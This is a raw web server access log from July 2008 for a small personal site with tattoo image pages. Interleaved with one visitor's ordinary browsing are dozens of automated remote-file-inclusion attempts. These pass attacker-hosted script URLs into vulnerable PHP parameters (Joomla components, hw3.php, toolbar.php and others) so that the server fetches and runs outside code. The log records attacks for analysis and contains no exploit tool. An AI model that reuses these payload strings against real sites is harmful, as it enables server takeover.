201.130.79.130 - - [31/Jul/2008:04:34:55 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 360 "-""libwww-perl/5.803"
201.130.79.130 - - [31/Jul/2008:04:34:57 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.803"
201.130.79.130 - - [31/Jul/2008:04:34:57 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
201.130.79.130 - - [31/Jul/2008:04:35:09 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 365 "-""libwww-perl/5.803"
201.130.79.130 - - [31/Jul/2008:04:35:09 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 360 "-""libwww-perl/5.803"
74.54.108.98 - - [31/Jul/2008:04:36:27 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.811"
74.54.108.98 - - [31/Jul/2008:04:36:27 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.811"
200.11.67.242 - - [31/Jul/2008:04:36:42 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 365 "-""libwww-perl/5.65"
200.11.67.242 - - [31/Jul/2008:04:36:43 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 360 "-""libwww-perl/5.65"
200.11.67.242 - - [31/Jul/2008:04:36:45 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 365 "-""libwww-perl/5.65"
200.11.67.242 - - [31/Jul/2008:04:36:45 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 360 "-""libwww-perl/5.65"
74.54.108.98 - - [31/Jul/2008:04:36:56 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.811"
74.54.108.98 - - [31/Jul/2008:04:36:56 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.811"
77.87.191.61 - - [31/Jul/2008:04:37:24 -0500] "GET /logs//?path%5Bdocroot%5D=http://gezonder.nl//txt/idnews.txt? HTTP/1.1" 200 93420 "-""libwww-perl/5.76"
77.87.191.61 - - [31/Jul/2008:04:37:25 -0500] "GET //?path%5Bdocroot%5D=http://gezonder.nl//txt/idnews.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.76"
70.84.182.98 - - [31/Jul/2008:04:37:57 -0500] "GET /logs/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 93415 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:04:37:58 -0500] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:04:38:05 -0500] "GET /logs//errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:04:38:05 -0500] "GET //errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:04:38:06 -0500] "GET /logs//errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:04:38:06 -0500] "GET //errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:04:38:11 -0500] "GET /logs/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 93415 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:04:38:11 -0500] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
200.11.67.242 - - [31/Jul/2008:04:38:25 -0500] "GET /logs/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 93415 "-""libwww-perl/5.65"
200.11.67.242 - - [31/Jul/2008:04:38:26 -0500] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.65"
201.130.79.130 - - [31/Jul/2008:04:38:49 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 365 "-""libwww-perl/5.803"
201.130.79.130 - - [31/Jul/2008:04:38:49 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 360 "-""libwww-perl/5.803"
201.130.79.130 - - [31/Jul/2008:04:39:07 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 365 "-""libwww-perl/5.803"
201.130.79.130 - - [31/Jul/2008:04:39:10 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 360 "-""libwww-perl/5.803"
74.54.108.98 - - [31/Jul/2008:04:40:24 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.811"
74.54.108.98 - - [31/Jul/2008:04:40:24 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.811"
83.223.15.168 - - [31/Jul/2008:04:40:43 -0500] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://64.251.8.142/dark/safe.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
83.223.15.168 - - [31/Jul/2008:04:40:43 -0500] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://64.251.8.142/dark/safe.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
201.36.250.17 - - [31/Jul/2008:04:41:18 -0500] "GET /index.php?qid=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.800"
74.54.108.98 - - [31/Jul/2008:04:41:44 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.811"
74.54.108.98 - - [31/Jul/2008:04:41:44 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.811"
207.58.128.249 - - [31/Jul/2008:04:41:54 -0500] "GET /logs/send_reminders.php?includedir=http://www.proostjes.be/calendar/help01.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
207.58.128.249 - - [31/Jul/2008:04:41:54 -0500] "GET /send_reminders.php?includedir=http://www.proostjes.be/calendar/help01.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:04:42:38 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:04:42:38 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
210.127.253.161 - - [31/Jul/2008:04:42:41 -0500] "GET /logs/access_log.1214438400///vwar/backup/errors.php?error=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
210.127.253.161 - - [31/Jul/2008:04:42:41 -0500] "GET ///vwar/backup/errors.php?error=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
210.127.253.161 - - [31/Jul/2008:04:42:42 -0500] "GET /logs///vwar/backup/errors.php?error=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
200.11.67.242 - - [31/Jul/2008:04:42:54 -0500] "GET /logs/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 93415 "-""libwww-perl/5.65"
200.11.67.242 - - [31/Jul/2008:04:42:55 -0500] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.65"
70.84.182.98 - - [31/Jul/2008:04:43:01 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:04:43:01 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
200.11.67.242 - - [31/Jul/2008:04:43:32 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.65"
200.11.67.242 - - [31/Jul/2008:04:43:33 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.65"
79.98.23.1 - - [31/Jul/2008:04:43:56 -0500] "GET /logs//param.peoplebook.php?mosConfig_absolute_path=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.79"
79.98.23.1 - - [31/Jul/2008:04:43:56 -0500] "GET //param.peoplebook.php?mosConfig_absolute_path=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
90.3.115.62 - - [31/Jul/2008:04:44:28 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
90.3.115.62 - - [31/Jul/2008:04:44:29 -0500] "GET //skin/zero_vote/error.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
90.3.115.62 - - [31/Jul/2008:04:44:36 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
90.3.115.62 - - [31/Jul/2008:04:44:38 -0500] "GET /logs//skin/zero_vote/index.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
90.3.115.62 - - [31/Jul/2008:04:44:39 -0500] "GET //skin/zero_vote/index.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
90.3.115.62 - - [31/Jul/2008:04:44:42 -0500] "GET //skin/zero_vote/error.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
200.11.67.242 - - [31/Jul/2008:04:45:25 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.65"
200.11.67.242 - - [31/Jul/2008:04:45:26 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.65"
121.217.213.90 - - [31/Jul/2008:04:45:46 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://www.google.com.au/search?hl=en&q=bert+grimm+flash&meta=""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
121.217.213.90 - - [31/Jul/2008:04:45:47 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
121.217.213.90 - - [31/Jul/2008:04:45:47 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
121.217.213.90 - - [31/Jul/2008:04:45:57 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
121.217.213.90 - - [31/Jul/2008:04:46:01 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2676 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
121.217.213.90 - - [31/Jul/2008:04:46:01 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
121.217.213.90 - - [31/Jul/2008:04:46:01 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
90.3.115.62 - - [31/Jul/2008:04:46:04 -0500] "GET /logs//login.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
90.3.115.62 - - [31/Jul/2008:04:46:05 -0500] "GET //login.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
121.217.213.90 - - [31/Jul/2008:04:46:07 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
121.217.213.90 - - [31/Jul/2008:04:46:10 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
121.217.213.90 - - [31/Jul/2008:04:46:12 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
121.217.213.90 - - [31/Jul/2008:04:46:17 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
121.217.213.90 - - [31/Jul/2008:04:46:19 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
121.217.213.90 - - [31/Jul/2008:04:46:27 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
121.217.213.90 - - [31/Jul/2008:04:46:29 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
121.217.213.90 - - [31/Jul/2008:04:46:33 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
121.217.213.90 - - [31/Jul/2008:04:46:40 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 2378 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
121.217.213.90 - - [31/Jul/2008:04:46:41 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
121.217.213.90 - - [31/Jul/2008:04:46:41 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
121.217.213.90 - - [31/Jul/2008:04:46:48 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
121.217.213.90 - - [31/Jul/2008:04:46:52 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
121.217.213.90 - - [31/Jul/2008:04:46:57 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
121.217.213.90 - - [31/Jul/2008:04:46:59 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
121.217.213.90 - - [31/Jul/2008:04:47:07 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
121.217.213.90 - - [31/Jul/2008:04:47:07 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
121.217.213.90 - - [31/Jul/2008:04:47:12 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
121.217.213.90 - - [31/Jul/2008:04:47:17 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
74.53.89.162 - - [31/Jul/2008:04:47:19 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 348 "-""libwww-perl/5.79"
74.53.89.162 - - [31/Jul/2008:04:47:19 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
90.3.115.62 - - [31/Jul/2008:04:47:22 -0500] "GET /logs//error.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
90.3.115.62 - - [31/Jul/2008:04:47:25 -0500] "GET //error.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
121.217.213.90 - - [31/Jul/2008:04:47:30 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 2177 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
121.217.213.90 - - [31/Jul/2008:04:47:30 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
121.217.213.90 - - [31/Jul/2008:04:47:30 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
121.217.213.90 - - [31/Jul/2008:04:47:37 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
121.217.213.90 - - [31/Jul/2008:04:47:38 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
121.217.213.90 - - [31/Jul/2008:04:47:42 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
121.217.213.90 - - [31/Jul/2008:04:47:43 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
121.217.213.90 - - [31/Jul/2008:04:47:45 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
121.217.213.90 - - [31/Jul/2008:04:47:50 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
121.217.213.90 - - [31/Jul/2008:04:47:50 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
121.217.213.90 - - [31/Jul/2008:04:47:53 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
121.217.213.90 - - [31/Jul/2008:04:48:07 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1762 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
121.217.213.90 - - [31/Jul/2008:04:48:08 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
121.217.213.90 - - [31/Jul/2008:04:48:08 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
121.217.213.90 - - [31/Jul/2008:04:48:10 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
79.98.23.1 - - [31/Jul/2008:04:48:11 -0500] "GET /logs//home.php?action=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
79.98.23.1 - - [31/Jul/2008:04:48:12 -0500] "GET //home.php?action=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
121.217.213.90 - - [31/Jul/2008:04:48:14 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
121.217.213.90 - - [31/Jul/2008:04:48:15 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
121.217.213.90 - - [31/Jul/2008:04:48:18 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
121.217.213.90 - - [31/Jul/2008:04:48:19 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
60.250.73.179 - - [31/Jul/2008:04:48:24 -0500] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://www.indigames.com/forum/theme.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
60.250.73.179 - - [31/Jul/2008:04:48:25 -0500] "GET //includes/ktedit/toolbar.php?dirDepth=http://www.indigames.com/forum/theme.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
121.217.213.90 - - [31/Jul/2008:04:48:25 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
121.217.213.90 - - [31/Jul/2008:04:48:28 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
90.3.115.62 - - [31/Jul/2008:04:48:31 -0500] "GET /logs//skin/zero_vote/index.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
